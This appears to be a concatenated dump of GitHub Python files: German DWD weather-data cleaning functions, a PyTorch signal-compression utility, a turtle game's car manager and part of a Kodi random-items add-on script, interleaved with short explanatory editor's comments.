list3, list4 = [], [], []\n cols = ['KE','ST','JA','MO','TA','--','P1','Q','P2','Q','P3','Q','PM','Q','TXK','Q','TNK','Q','TRK','Q','TGK','S',\n 'Q','T1','Q','T2','Q','T3','Q','TMK','Q','TF1','ETF1','Q','TF2','ETF2','Q','TF3','ETF3','Q','VP1','Q','VP2',\n 'Q','VP3','Q','VPM','Q','UP1','Q','UP2','Q','UP3','Q','UPM','Q','UR1','Q','UR2','Q','UR3','Q','D1','FK1','Q',\n 'D2','FK2','Q','D3','FK3','Q','FMK','Q','N1','Q','C1','Q','W1','Q','N2','Q','C2','Q','W2','Q','N3','Q','C3',\n 
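# --- Editor's note: illustrative sketch, not part of the original record. ---
# Tageswerte_entpacken above extracts only the archive members whose name starts with
# 'produkt_klima_tag_' instead of unpacking whole ZIP files. The same pattern as a small
# standalone helper; the archive name in the commented call is an example, not real data:
import zipfile

def extract_matching(archive_path, prefix, dest):
    with zipfile.ZipFile(archive_path, 'r') as zf:
        for member in zf.namelist():
            if member.startswith(prefix):
                zf.extract(member=member, path=dest)

# extract_matching('tageswerte_KL_00044_akt.zip', 'produkt_klima_tag_', '.')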
'Q','W3','Q','NM','Q','SDK','SDJ','Q','V1','Q','V2','Q','V3','Q','E1','Q','E2','Q','E3','Q','VAK','Q','VBK',\n 'Q','VCK','Q','R1','RF1','Q','R2','RF2','Q','R3','RF3','Q','RSK','RSKF','Q','SHK','SA','Q','NSH','NSHJ','Q',\n 'FXK','Q','ASH','Q','WAAS','Q','WASH','Q']\n filelist = [] #['kl_10147_00_akt.txt']\n \n dataframe_temp = pd.DataFrame()\n dataframe = pd.DataFrame()\n \n pfad_entpackt = 'backlog/' + datum + '/entpackt'\n \n for file in os.listdir(pfad_entpackt):\n if file.startswith('kl_') and file.endswith('_00_akt.txt'):\n filelist += [file]\n \n for file in filelist:\n with open(pfad_entpackt + '/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n imp = imp.split('\\n')\n\n for y in imp:\n j = 0\n list2 = []\n for x in split:\n list2 = y[j:x]\n j = x\n \n list3 += [list2]\n \n list4 += [list3]\n list3 = []\n \n dataframe_temp = pd.DataFrame.from_dict(list4)\n list4 = []\n dataframe_temp = dataframe_temp.append(pd.Series(cols, index=dataframe_temp.columns ), ignore_index=True)\n headers = dataframe_temp.iloc[-1]\n dataframe_temp = pd.DataFrame(dataframe_temp.values[0:], columns=headers)\n dataframe_temp = dataframe_temp.drop(dataframe_temp.index[-1], axis=0)\n dataframe_temp = dataframe_temp.drop(['Q'], axis=1)\n stations_id = str(file).split('_')[2]\n dataframe_temp['ST'] = file.replace('kl_', '').replace('_00_akt.txt', '')\n dataframe_temp['MESS_DATUM'] = dataframe_temp['JA'] + '-' + dataframe_temp['MO'] + '-' + dataframe_temp['TA']\n dataframe_temp = dataframe_temp.loc[dataframe_temp['MESS_DATUM'] >= ab_datum]\n \n dataframe = dataframe.append(dataframe_temp)\n dataframe.drop_duplicates(inplace=True)\n if ausgabe == 1:\n print(file, len(dataframe_temp))\n dataframe_temp = pd.DataFrame()\n \n print('Tageswerte ab dem ' + ab_datum + ' in das DataFrame importiert')\n \n return dataframe\n\n\ndef Tageswerte2_transformieren(dataframe):\n # subdaily-DataFrame anpassen\n # auf die Spalten in subdaily_columns einschränken\n subdaily_columns = ['ST', 'FXK', 'FMK', 'RSK', 'RSKF', 'SDK', 'SHK', 'NM', \n 'VPM', 'PM', 'TMK', 'UPM', 'TXK', 'TNK', 'TGK', 'MESS_DATUM']\n daily_columns = ['STATIONS_ID', 'FX', 'FM', 'RSK', 'RSKF', 'SDK', 'SHK_TAG', 'NM', \n 'VPM', 'PM', 'TMK', 'UPM', 'TXK', 'TNK', 'TGK', 'MESS_DATUM']\n \n dataframe = dataframe[subdaily_columns]\n # Spaltenüberschriften aus den daily_columns übernehmen\n dataframe.columns = daily_columns\n \n to_change = [col for col in dataframe.columns if col not in ['MESS_DATUM', 'STATIONS_ID']]\n \n for col in to_change:\n dataframe[col] = dataframe[col].astype('float64')\n dataframe['MESS_DATUM'] = dataframe['MESS_DATUM'].astype('datetime64[D]')\n dataframe['STATIONS_ID'] = dataframe['STATIONS_ID'].astype('category')\n dataframe['RSKF'] = dataframe['RSKF'].astype('category')\n\n dataframe = dataframe.reset_index().drop('index', axis=1)\n \n dataframe.loc[dataframe['FX'] != -99, 'FX'] = dataframe['FX'] * 0.1\n dataframe.loc[dataframe['FM'] != -99, 'FM'] = (0.836 * dataframe['FM'] * dataframe['FM']**0.5) * 0.1\n dataframe.loc[dataframe['RSK'] != -999, 'RSK'] = dataframe['RSK'] * 0.1\n dataframe.loc[dataframe['SDK'] != -99, 'SDK'] = dataframe['SDK'] *0.1\n dataframe.loc[dataframe['NM'] != -99, 'NM'] = dataframe['NM'] * 0.1\n dataframe.loc[dataframe['VPM'] != -99, 'VPM'] = dataframe['VPM'] * 0.1\n dataframe.loc[dataframe['PM'] != -9999, 'PM'] = dataframe['PM'] * 0.1\n dataframe.loc[dataframe['TMK'] != -999, 'TMK'] = dataframe['TMK'] * 0.1\n dataframe.loc[dataframe['TXK'] != -999, 'TXK'] = dataframe['TXK'] * 0.1\n 
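# --- Editor's note: illustrative sketch, not part of the original record. ---
# Tageswerte2_transformieren above rescales DWD raw values (stored in tenths) while
# leaving sentinel codes such as -99/-999/-9999 untouched. The many repeated
# `dataframe.loc[dataframe[col] != sentinel, col] = dataframe[col] * 0.1` lines can be
# expressed once as a helper; the column name and sentinel below follow the record:
import pandas as pd

def rescale_except_sentinel(df, column, sentinel, factor=0.1):
    mask = df[column] != sentinel
    df.loc[mask, column] = df.loc[mask, column] * factor
    return df

demo = pd.DataFrame({'TMK': [215.0, -999.0, 187.0]})
print(rescale_except_sentinel(demo, 'TMK', -999))   # 21.5, -999.0, 18.7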
dataframe.loc[dataframe['TNK'] != -999, 'TNK'] = dataframe['TNK'] * 0.1\n dataframe.loc[dataframe['TGK'] != -999, 'TGK'] = dataframe['TGK'] * 0.1\n \n return dataframe\n\n\ndef Tageswerte_zusammenlegen(subdaily, daily):\n # daily-DataFrame anpassen\n to_change = [col for col in daily.columns if col not in ['MESS_DATUM', 'STATIONS_ID']]\n \n for col in to_change:\n daily[col] = daily[col].astype('float64')\n daily['MESS_DATUM'] = daily['MESS_DATUM'].astype('datetime64[D]')\n daily['STATIONS_ID'] = daily['STATIONS_ID'].astype('category')\n daily['RSKF'] = daily['RSKF'].astype('category')\n daily['NM'] = daily['NM'].astype('category')\n \n # DataFrames zusammenführen\n dataframe = subdaily.append(daily)\n dataframe['STATIONS_ID'] = dataframe['STATIONS_ID'].astype('category')\n dataframe = dataframe.reset_index().drop('index', axis=1)\n dataframe.drop_duplicates(inplace=True)\n \n return dataframe\n\n\ndef Stationsdaten_loeschen(dataframe, days):\n filelist = []\n pfad = 'backlog/'\n \n last_days = dataframe['bis_datum'].max() - dt.timedelta(days)\n\n filelist = [f for f in os.listdir(pfad) if os.path.isdir(os.path.join(pfad, f))]\n \n j = 0\n for i in filelist:\n if i < str(last_days):\n shutil.rmtree(pfad + '/' + i)\n print('Das Verzeichnis ', i, ' wurde gelöscht.')\n j = j + 1\n \n if j == 0:\n print('Es wurde kein Verzeichnis gelöscht.')\n \n return\n\n\ndef best_formula(dataframe, response):\n remaining = set(dataframe.columns)\n remaining.remove(response)\n selected, results = [], []\n while remaining:\n scores_with_candidates = []\n for candidate in remaining:\n formula = '{} ~ {}'.format(response, ' + '.join(selected + [candidate]))\n lm = smf.gls(formula, sm.add_constant(dataframe)).fit()\n score = lm.rsquared_adj\n scores_with_candidates.append((score, candidate, [formula, lm.rsquared_adj, lm.ssr]))\n scores_with_candidates.sort()\n best_score, best_candidate, best_metrics = scores_with_candidates.pop()\n results.append(best_metrics)\n remaining.remove(best_candidate)\n selected.append(best_candidate)\n dataframe = pd.DataFrame(results)\n dataframe.columns = ['formula', 'adjr2', 'ssr']\n dataframe = dataframe.sort_values('adjr2', axis=0, ascending=False)[:1].reset_index()\n formula = str(dataframe['formula'].values).replace('[', '').replace(']', '').replace(\"'\", '')\n \n return formula, dataframe\n\n\ndef df_infos(dateframe): \n result=pd.DataFrame()\n result[\"Columns\"]=[x for x in dateframe.columns]\n result[\"type\"]=[x for x in dateframe.dtypes]\n result[\"Unique values count\"]=[dateframe.groupby(x)[x].count().shape[0] for x in dateframe.columns]\n result[\"Zeros\"]=[sum(dateframe[x] == 0) for x in dateframe.columns]\n result[\"NaNs\"]=[sum(dateframe[x] == np.NaN) for x in dateframe.columns]\n result['Sample']=[dateframe[x][10] for x in dateframe.columns]\n \n return result\n\n\ndef rnd_stations(dataframe, anzahl):\n dataframe_temp1 = pd.DataFrame()\n dataframe_temp2 = pd.DataFrame()\n \n list1 = dataframe['STATIONS_ID'].unique()\n random_items = random.choices(population=list1, k=anzahl)\n \n for i in random_items:\n dataframe_temp2 = dataframe.loc[dataframe['STATIONS_ID'] == i]\n dataframe_temp1 = dataframe_temp1.append(dataframe_temp2)\n \n return dataframe_temp1\n\n\ndef zeitraeume_ergaenzen(dataframe):\n df_rest = dataframe.copy()\n\n list1 = list(set(dataframe['STATIONS_ID']))\n list2 = []\n df_temp = pd.DataFrame()\n df_asdf = pd.DataFrame()\n madate = max(df_rest['MESS_DATUM'])\n midate = min(df_rest['MESS_DATUM'])\n dedate = int(str(madate - midate).replace(' days 
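# --- Editor's note: illustrative sketch, not part of the original record. ---
# best_formula above implements forward stepwise selection: each round it tries every
# remaining regressor, keeps the candidate that maximises adjusted R-squared, and records
# the winning formula. A compact single-round example on synthetic data; it uses smf.ols
# rather than the record's smf.gls, and the column names are assumptions for illustration:
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(0)
df = pd.DataFrame({'x1': rng.normal(size=100), 'x2': rng.normal(size=100)})
df['y'] = 2 * df['x1'] + 0.1 * rng.normal(size=100)

best = None
for candidate in ['x1', 'x2']:
    fit = smf.ols('y ~ {}'.format(candidate), data=df).fit()
    if best is None or fit.rsquared_adj > best[1]:
        best = (candidate, fit.rsquared_adj)
print(best)   # expected to pick 'x1'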
00:00:00', '')) + 1\n maxdate = df_rest.copy()\n maxdate.index = pd.DatetimeIndex(df_rest['MESS_DATUM']).floor('D')\n\n dates = pd.date_range(midate, madate)\n\n for s in list1:\n df_temp = dataframe.loc[dataframe['STATIONS_ID'] == s]\n if df_temp.shape[0] < dedate:\n list2 += [s]\n\n df_temp = pd.DataFrame()\n for t in list2:\n #print('start', df_rest.shape)\n df_drop = dataframe.loc[dataframe['STATIONS_ID'] == t]\n df_rest = df_rest.drop(df_drop.index, axis=0)\n #print('after drop', df_rest.shape)\n df_temp = dataframe.loc[dataframe['STATIONS_ID'] == t]\n a = df_temp.shape\n #print('len station original', t, a)\n df_temp.index = pd.DatetimeIndex(df_temp['MESS_DATUM']).floor('D')\n #print(df_asdf.index)\n all_days = pd.date_range(df_temp.index.min(), maxdate.index.max(), freq='D')\n #print(all_days)\n df_temp = df_temp.loc[all_days]\n df_temp['STATIONS_ID'] = t\n df_temp['MESS_DATUM'] = df_temp.index\n df_temp = df_temp.reset_index().drop('index', axis=1)\n b = df_temp.shape\n #print('len station new', t, b)\n #print('delta', t, b[0] - a[0])\n df_asdf = df_asdf.append(df_temp)\n #print('sum end', df_asdf.shape)\n #print('----------')\n\n df = df_rest.append(df_asdf)\n\n madate = max(df['MESS_DATUM'])\n midate = min(df['MESS_DATUM'])\n dedate = int(str(madate - midate).replace(' days 00:00:00', '')) + 1\n anzahl_stat = len(df['STATIONS_ID'].unique())\n anzahl_dsatz = len(df)\n anzahl_dsoll = anzahl_stat * dedate\n anzahl_dfehl = anzahl_dsoll - anzahl_dsatz\n\n if anzahl_dfehl == 0:\n print('Alle fehlenden Werte (Zeitäume) wurden ergänzt')\n else:\n print('Nicht alle fehlenden Werte (Zeitäume) wurden ergänzt')\n \n return df\n\n\ndef fehlwerte_ermitteln(dataframe):\n df_temp = dataframe.copy()\n \n df_temp = df_temp.replace(-9999, np.NaN).replace(-999, np.NaN).replace(-99, np.NaN)\n count = df_temp.isnull().values.sum()\n\n print('Gesamtzahl aller Fehlwerte: ', count)\n\n return df_temp\n\n\ndef einzelne_fehlwerte_ersetzen(dataframe):\n df_temp = dataframe.copy()\n list1 = list(set(dataframe['STATIONS_ID']))\n list2 = list(set(dataframe['MESS_DATUM']))\n dft1 = pd.DataFrame()\n dft2 = pd.DataFrame()\n dft3 = pd.DataFrame()\n \n df_temp = df_temp.replace(-9999, np.NaN).replace(-999, np.NaN).replace(-99, np.NaN)\n df_temp = df_temp.sort_values(by=['STATIONS_ID', 'MESS_DATUM'])\n \n for s in list1:\n dft1 = df_temp.loc[df_temp['STATIONS_ID'] == s]\n dft1 = dft1.fillna(method='pad')\n dft1 = dft1.fillna(method='backfill')\n dft2 = dft2.append(dft1)\n \n dft2 = dft2.sort_values(by=['MESS_DATUM', 'STATIONS_ID'])\n dft1 = pd.DataFrame()\n \n for t in list2:\n dft1 = dft2.loc[dft2['MESS_DATUM'] == t]\n dft1 = dft1.fillna(method='pad')\n dft1 = dft1.fillna(method='backfill')\n dft3 = dft3.append(dft1)\n \n dft3 = dft3.sort_values(by=['STATIONS_ID', 'MESS_DATUM'])\n \n dft3.drop_duplicates(inplace=True)\n dft3['STATIONS_ID'] = dft3['STATIONS_ID'].astype('int64')\n dft3['NM'] = dft3['NM'].astype('category')\n \n print('Einzele Fehlwerte wurden ersetzt')\n \n return dft3\n\n\ndef rest_fehlwerte_ersetzen(dataframe):\n df_temp = dataframe.copy()\n \n df_temp = df_temp.replace(np.NaN, 0)\n \n return df_temp\n\ndef Plausi_Voll(dataframe):\n # Funktionen\n madate = max(dataframe['MESS_DATUM'])\n midate = min(dataframe['MESS_DATUM'])\n dedate = int(str(madate - midate).replace(' days 00:00:00', '')) + 1\n anzahl_stat = len(dataframe['STATIONS_ID'].unique())\n anzahl_dsatz = len(dataframe)\n anzahl_dsoll = anzahl_stat * dedate\n anzahl_dfehl = anzahl_dsoll - anzahl_dsatz\n \n # Ausdruck\n print('Mindestdatum: 
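# --- Editor's note: illustrative sketch, not part of the original record. ---
# zeitraeume_ergaenzen above pads incomplete stations out to the full observation window
# by building a DatetimeIndex and selecting every calendar day. The core move is pandas
# reindexing; note that newer pandas raises a KeyError when .loc is given missing labels
# (as the record's `df_temp.loc[all_days]` does), so reindex() is the safer spelling:
import pandas as pd

s = pd.DataFrame({'TMK': [1.0, 3.0]},
                 index=pd.to_datetime(['2020-01-01', '2020-01-03']))
all_days = pd.date_range('2020-01-01', '2020-01-04', freq='D')
padded = s.reindex(all_days)      # missing days appear as NaN rows
print(len(padded))                # 4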
', midate)\n print('Höchstdatum: ', madate)\n print('Anzahl Tage: ', dedate)\n print('Anzahl Stationen IST: ', anzahl_stat)\n print('Anzahl Datensätze IST: ', anzahl_dsatz)\n print('Anzahl Datensätze SOLL: ', anzahl_dsoll)\n print('Anzahl fehlender Datensätze: ', anzahl_dfehl)\n\n return\n\n","repo_name":"carmir71/dwd","sub_path":"funktionen_0.py","file_name":"funktionen_0.py","file_ext":"py","file_size_in_byte":23822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34034698450","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 20 18:14:12 2022\n\n@author: anagathil\n\"\"\"\nimport torch\n\ndef comp(x,c,mode):\n if mode == 'symlog':\n y = torch.sign(x)*torch.log(1+c*torch.abs(x))\n elif mode == 'sqrt':\n y = torch.sign(x)*torch.pow(torch.abs(x),c)\n return y\n\ndef invcomp(y,c,mode):\n if mode == 'symlog':\n x = torch.sign(y)*(torch.exp(torch.abs(y))-1)/c\n elif mode == 'sqrt':\n x = torch.sign(y)*torch.pow(torch.abs(y),1/c);\n return x\n \n\ndef rescaleIhcograms(scaleType,scaleWeight,neurogram_pred,neurogram,normFactor):\n if scaleType == 'symlog' or scaleType == 'sqrt':\n neurogram_pred = invcomp(neurogram_pred*normFactor, scaleWeight, scaleType) \n neurogram = invcomp(neurogram*normFactor, scaleWeight, scaleType)\n else:\n neurogram_pred = neurogram_pred*normFactor\n neurogram = neurogram*normFactor\n return neurogram_pred, neurogram\n\n","repo_name":"ika-ruhr-uni-bochum/IHCApproxNH","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"30432831488","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"yellow\", \"blue\", \"red\", \"green\", \"purple\"]\nMOVE_PACE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.all_cars = []\n self.move_speed = MOVE_PACE\n\n def create_car(self):\n random_num = random.randint(1, 6)\n if random_num == 1:\n new_car = Turtle(\"square\")\n new_car.color(random.choice(COLORS))\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n random_y = random.randint(-250, 250)\n new_car.penup()\n new_car.goto(300, random_y)\n self.all_cars.append(new_car)\n\n def move_cars(self):\n for car in self.all_cars:\n car.backward(self.move_speed)\n\n def level_up(self):\n self.move_speed += MOVE_INCREMENT\n\n","repo_name":"SunshineFaxixi/Python_Learning","sub_path":"100days_of_python/day23/car_management.py","file_name":"car_management.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39623507095","text":"# * Thanks to:\n# *\n# * Nuka for the original RecentlyAdded.py on which this is based\n# *\n# * ppic, Hitcher,ronie & phil65, Martijn for the updates\n\nimport xbmc\nimport xbmcgui\nimport xbmcaddon\nimport sys\nimport os\nimport random\n\nif sys.version_info < (2, 7):\n import simplejson\nelse:\n import json as simplejson\n\n__addon__ = xbmcaddon.Addon()\n__addonid__ = __addon__.getAddonInfo('id')\n__addonversion__ = __addon__.getAddonInfo('version')\n\ndef log(txt):\n message = '%s: %s' % (__addonid__, txt)\n xbmc.log(msg=message, level=xbmc.LOGDEBUG)\n\nclass Main:\n def __init__( self ):\n # parse argv for any preferences\n self._parse_argv()\n self._init_vars()\n # check if we were executed internally\n if self.ALBUMID:\n xbmc.executeJSONRPC('{ \"jsonrpc\": \"2.0\", \"method\": 
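# --- Editor's note: illustrative sketch, not part of the original records. ---
# comp()/invcomp() in the IHCApproxNH utils.py record above are exact inverses for both
# the 'symlog' and 'sqrt' modes, which is what lets rescaleIhcograms undo the
# training-time compression. A quick round-trip check of that property:
import torch

def comp(x, c, mode):
    if mode == 'symlog':
        return torch.sign(x) * torch.log(1 + c * torch.abs(x))
    return torch.sign(x) * torch.pow(torch.abs(x), c)        # 'sqrt'

def invcomp(y, c, mode):
    if mode == 'symlog':
        return torch.sign(y) * (torch.exp(torch.abs(y)) - 1) / c
    return torch.sign(y) * torch.pow(torch.abs(y), 1 / c)    # 'sqrt'

x = torch.tensor([-0.5, 0.0, 0.25])
assert torch.allclose(invcomp(comp(x, 2.0, 'symlog'), 2.0, 'symlog'), x)
assert torch.allclose(invcomp(comp(x, 0.5, 'sqrt'), 0.5, 'sqrt'), x)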
\"Player.Open\", \"params\": { \"item\": { \"albumid\": %d } }, \"id\": 1 }' % int(self.ALBUMID))\n else:\n # clear our property, if another instance is already running it should stop now\n self.WINDOW.clearProperty('RandomItems_Running_Running')\n # clear properties\n self._clear_properties()\n # set any alarm\n self._set_alarm()\n # fetch media info\n self._fetch_movie_info()\n self._fetch_episode_info()\n self._fetch_musicvideo_info()\n self._fetch_album_info()\n self._fetch_artist_info()\n self._fetch_song_info()\n self._fetch_addon_info()\n xbmc.sleep(1000)\n self.WINDOW.setProperty('RandomItems_Running', 'True')\n self._daemon()\n \n def _parse_argv( self ):\n try:\n # parse sys.argv for params\n params = dict( arg.split( \"=\" ) for arg in sys.argv[ 1 ].split( \"&\" ) )\n except:\n # no params passed\n params = {}\n # set our preferences\n self.LIMIT = int( params.get( \"limit\", \"5\" ) )\n self.UNPLAYED = params.get( \"unplayed\", \"False\" )\n self.PLAY_TRAILER = params.get( \"trailer\", \"False\" )\n self.ALARM = int( params.get( \"alarm\", \"0\" ) )\n self.ALBUMID = params.get( \"albumid\", \"\" )\n\n def _init_vars( self ):\n self.WINDOW = xbmcgui.Window( 10000 )\n self.Player = MyPlayer( action = self._update)\n self.Monitor = MyMonitor(action = self._update)\n\n def _clear_properties( self ):\n # reset totals property for visible condition\n self.WINDOW.clearProperty( \"RandomAddon.Count\" )\n # we clear title for visible condition\n for count in range( self.LIMIT ):\n self.WINDOW.clearProperty( \"RandomMovie.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomEpisode.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomMusicVideo.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomSong.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomAlbum.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomAddon.%d.Name\" % ( count + 1 ) )\n\n def _set_alarm( self ):\n # only run if user/skinner preference\n if ( not self.ALARM ): return\n # set the alarms command\n command = \"XBMC.RunScript(%s,limit=%d&unplayed=%s&trailer=%s&alarm=%d)\" % ( __addonid__, self.LIMIT, str( self.UNPLAYED ), str( self.PLAY_TRAILER ), self.ALARM, )\n xbmc.executebuiltin( \"AlarmClock(RandomItems,%s,%d,true)\" % ( command, self.ALARM, ) )\n\n def _fetch_movie_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMovies\", \"params\": {\"properties\": [\"title\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\", \"trailer\", \"rating\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMovies\", \"params\": {\"properties\": [\"title\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\", \"trailer\", \"rating\"], \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n json_query = unicode(json_query, 'utf-8', errors='ignore')\n # separate the records\n json_response = simplejson.loads(json_query)\n if json_response.has_key('result') and json_response['result'] != None and json_response['result'].has_key('movies'):\n count = 0\n for item in json_response['result']['movies']:\n count += 1\n # set our properties\n self.WINDOW.setProperty( 
\"RandomMovie.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Rating\" % ( count ), str(round(float(item['rating']),1)) )\n self.WINDOW.setProperty( \"RandomMovie.%d.Year\" % ( count ), str(item['year']))\n self.WINDOW.setProperty( \"RandomMovie.%d.Plot\" % ( count ), item['plot'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.RunningTime\" % ( count ), item['runtime'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Trailer\" % ( count ), item['trailer'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_episode_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetEpisodes\", \"params\": { \"properties\": [\"title\", \"playcount\", \"season\", \"episode\", \"showtitle\", \"plot\", \"fanart\", \"thumbnail\", \"file\", \"rating\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetEpisodes\", \"params\": { \"properties\": [\"title\", \"playcount\", \"season\", \"episode\", \"showtitle\", \"plot\", \"fanart\", \"thumbnail\", \"file\", \"rating\"], \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('episodes'):\n count = 0\n for item in jsonobject['result']['episodes']:\n count += 1\n season = \"%.2d\" % float(item['season'])\n episode = \"%.2d\" % float(item['episode'])\n episodeno = \"s%se%s\" % ( season, episode, )\n # set our properties\n self.WINDOW.setProperty( \"RandomEpisode.%d.ShowTitle\" % ( count ), item['showtitle'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeTitle\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeNo\" % ( count ), episodeno )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeSeason\" % ( count ), season )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeNumber\" % ( count ), episode )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Rating\" % ( count ), str(round(float(item['rating']),1)) )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Plot\" % ( count ), item['plot'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_musicvideo_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMusicVideos\", \"params\": {\"properties\": [\"title\", \"artist\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMusicVideos\", \"params\": 
{\"properties\": [\"title\", \"artist\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_query = unicode(json_query, 'utf-8', errors='ignore')\n # separate the records\n json_response = simplejson.loads(json_query)\n if json_response.has_key('result') and json_response['result'] != None and json_response['result'].has_key('musicvideos'):\n count = 0\n for item in json_response['result']['musicvideos']:\n count += 1\n # set our properties\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Year\" % ( count ), str(item['year']))\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Plot\" % ( count ), item['plot'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.RunningTime\" % ( count ), item['runtime'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Artist\" % ( count ), \" / \".join( item['artist'] ) )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_album_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetAlbums\", \"params\": {\"properties\": [\"title\", \"description\", \"albumlabel\", \"artist\", \"genre\", \"year\", \"thumbnail\", \"fanart\", \"rating\", \"playcount\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetAlbums\", \"params\": {\"properties\": [\"title\", \"description\", \"albumlabel\", \"artist\", \"genre\", \"year\", \"thumbnail\", \"fanart\", \"rating\", \"playcount\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('albums'):\n count = 0\n for item in jsonobject['result']['albums']:\n count += 1\n rating = str(item['rating'])\n if rating == '48':\n rating = ''\n path = 'XBMC.RunScript(' + __addonid__ + ',albumid=' + str(item['albumid']) + ')'\n self.WINDOW.setProperty( \"RandomAlbum.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Rating\" % ( count ), rating )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Year\" % ( count ), str(item['year']) )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Artist\" % ( count ), \" / \".join(item['artist']) )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Path\" % ( count ), path )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( 